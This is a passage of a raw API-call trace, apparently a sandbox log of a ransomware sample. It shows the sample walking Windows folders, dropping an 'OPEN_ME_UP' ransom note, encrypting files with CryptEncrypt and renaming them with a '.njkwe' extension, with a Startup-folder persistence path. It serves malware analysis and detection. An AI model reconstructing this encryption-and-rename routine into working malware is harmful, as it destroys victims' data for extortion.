lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1c05089, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1c05089, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc1c05089, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19de0 [0074.134] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.134] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.134] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.134] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.134] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.134] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\.") returned 37 [0074.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.134] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1c05089, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1c05089, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc1c05089, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.135] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.135] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.135] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.135] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.135] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.135] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\..") returned 38 [0074.135] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.135] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c05089, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1c05089, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc1c05089, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 1 [0074.135] lstrcmpiW (lpString1="ClickToRunPackageLocker", lpString2="Windows") returned -1 [0074.135] lstrcmpiW (lpString1="ClickToRunPackageLocker", lpString2="$Recycle.bin") returned 1 [0074.135] lstrcmpiW (lpString1="ClickToRunPackageLocker", lpString2="System Volume Information") returned -1 [0074.135] lstrcmpiW (lpString1="ClickToRunPackageLocker", lpString2="Program Files") returned -1 [0074.135] lstrcmpiW (lpString1="ClickToRunPackageLocker", lpString2="Program Files (x86)") returned -1 [0074.135] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\ClickToRunPackageLocker") returned 59 [0074.135] StrStrIW (lpFirst="ClickToRunPackageLocker", lpSrch=".njkwe") returned 0x0 [0074.135] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.135] lstrcmpW (lpString1="ClickToRunPackageLocker", lpString2="taridd") returned -1 [0074.135] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\ClickToRunPackageLocker", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.135] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\ClickToRunPackageLocker" (normalized: "c:\\programdata\\microsoft\\office\\clicktorunpackagelocker"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.136] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c05089, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1c05089, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc1c05089, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ClickToRunPackageLocker", cAlternateFileName="CLICKT~1")) returned 0 [0074.136] FindClose (in: hFindFile=0xc19de0 | out: hFindFile=0xc19de0) returned 1 [0074.136] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 67 [0074.136] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Office\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\office\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.136] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0074.137] CloseHandle (hObject=0x42c) returned 1 [0074.137] GetProcessHeap () returned 0xbe0000 [0074.137] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0074.138] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xfee8021d, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xfee8021d, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Provisioning", cAlternateFileName="PROVIS~1")) returned 1 [0074.138] lstrcmpiW (lpString1="Provisioning", lpString2="Windows") returned -1 [0074.138] lstrcmpiW (lpString1="Provisioning", lpString2="$Recycle.bin") returned 1 [0074.138] lstrcmpiW (lpString1="Provisioning", lpString2="System Volume Information") returned -1 [0074.138] lstrcmpiW (lpString1="Provisioning", lpString2="Program Files") returned 1 [0074.138] lstrcmpiW (lpString1="Provisioning", lpString2="Program Files (x86)") returned 1 [0074.138] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning") returned 41 [0074.138] lstrcmpW (lpString1="Provisioning", lpString2=".") returned 1 [0074.138] lstrcmpW (lpString1="Provisioning", lpString2="..") returned 1 [0074.138] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.138] GetProcessHeap () returned 0xbe0000 [0074.138] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0074.138] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\*") returned 43 [0074.138] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xfee8021d, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xfee8021d, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0074.141] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.141] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.141] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.141] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.141] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.141] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\.") returned 43 [0074.141] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.141] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xfee8021d, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xfee8021d, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.142] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.142] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.142] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.142] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.142] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.142] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\..") returned 44 [0074.142] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.142] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60aed0fe, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x60aed0fe, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x60aed0fe, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x70bb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="countrytable.xml", cAlternateFileName="")) returned 1 [0074.142] lstrcmpiW (lpString1="countrytable.xml", lpString2="Windows") returned -1 [0074.142] lstrcmpiW (lpString1="countrytable.xml", lpString2="$Recycle.bin") returned 1 [0074.142] lstrcmpiW (lpString1="countrytable.xml", lpString2="System Volume Information") returned -1 [0074.142] lstrcmpiW (lpString1="countrytable.xml", lpString2="Program Files") returned -1 [0074.142] lstrcmpiW (lpString1="countrytable.xml", lpString2="Program Files (x86)") returned -1 [0074.142] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml") returned 58 [0074.142] StrStrIW (lpFirst="countrytable.xml", lpSrch=".njkwe") returned 0x0 [0074.142] lstrcmpW (lpString1="countrytable.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.142] lstrcmpW (lpString1="countrytable.xml", lpString2="taridd") returned -1 [0074.142] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\countrytable.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\countrytable.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.144] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", cAlternateFileName="{18DCF~1")) returned 1 [0074.144] lstrcmpiW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="Windows") returned -1 [0074.144] lstrcmpiW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="$Recycle.bin") returned 1 [0074.144] lstrcmpiW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="System Volume Information") returned -1 [0074.144] lstrcmpiW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="Program Files") returned -1 [0074.144] lstrcmpiW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="Program Files (x86)") returned -1 [0074.144] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned 80 [0074.144] lstrcmpW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2=".") returned 1 [0074.144] lstrcmpW (lpString1="{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="..") returned 1 [0074.144] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.144] GetProcessHeap () returned 0xbe0000 [0074.144] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0074.145] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*") returned 82 [0074.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2e0 [0074.146] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.146] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.146] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.146] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.146] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.146] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\.") returned 82 [0074.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.146] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.146] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.146] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.146] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.146] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.146] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.146] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\..") returned 83 [0074.146] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.146] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.146] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ea7c91, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53ea7c91, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53ea7c91, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x98c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0074.146] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0074.146] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0074.146] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0074.146] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0074.146] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0074.146] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned 99 [0074.146] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0074.147] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.147] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0074.147] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.147] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.147] GetTickCount () returned 0x1152e40 [0074.147] GetTickCount () returned 0x1152e40 [0074.147] GetTickCount () returned 0x1152e40 [0074.147] GetTickCount () returned 0x1152e40 [0074.147] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.147] GetProcessHeap () returned 0xbe0000 [0074.147] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.148] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x98c, lpOverlapped=0x0) returned 1 [0074.150] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff674, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.150] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x98c, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x98c, lpOverlapped=0x0) returned 1 [0074.150] GetProcessHeap () returned 0xbe0000 [0074.150] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.150] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.150] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.150] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.150] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.150] CloseHandle (hObject=0x434) returned 1 [0074.150] GetProcessHeap () returned 0xbe0000 [0074.151] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.151] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0074.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.151] GetProcessHeap () returned 0xbe0000 [0074.151] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.151] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e5b7d8, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e5b7d8, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e5b7d8, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0074.151] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0074.151] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0074.151] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0074.151] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0074.151] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0074.152] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml") returned 100 [0074.152] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0074.152] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.152] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0074.152] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.152] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.153] GetTickCount () returned 0x1152e40 [0074.153] GetTickCount () returned 0x1152e40 [0074.153] GetTickCount () returned 0x1152e40 [0074.153] GetTickCount () returned 0x1152e40 [0074.153] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.153] GetProcessHeap () returned 0xbe0000 [0074.153] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.153] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.154] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.154] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0074.154] GetProcessHeap () returned 0xbe0000 [0074.154] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.154] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, 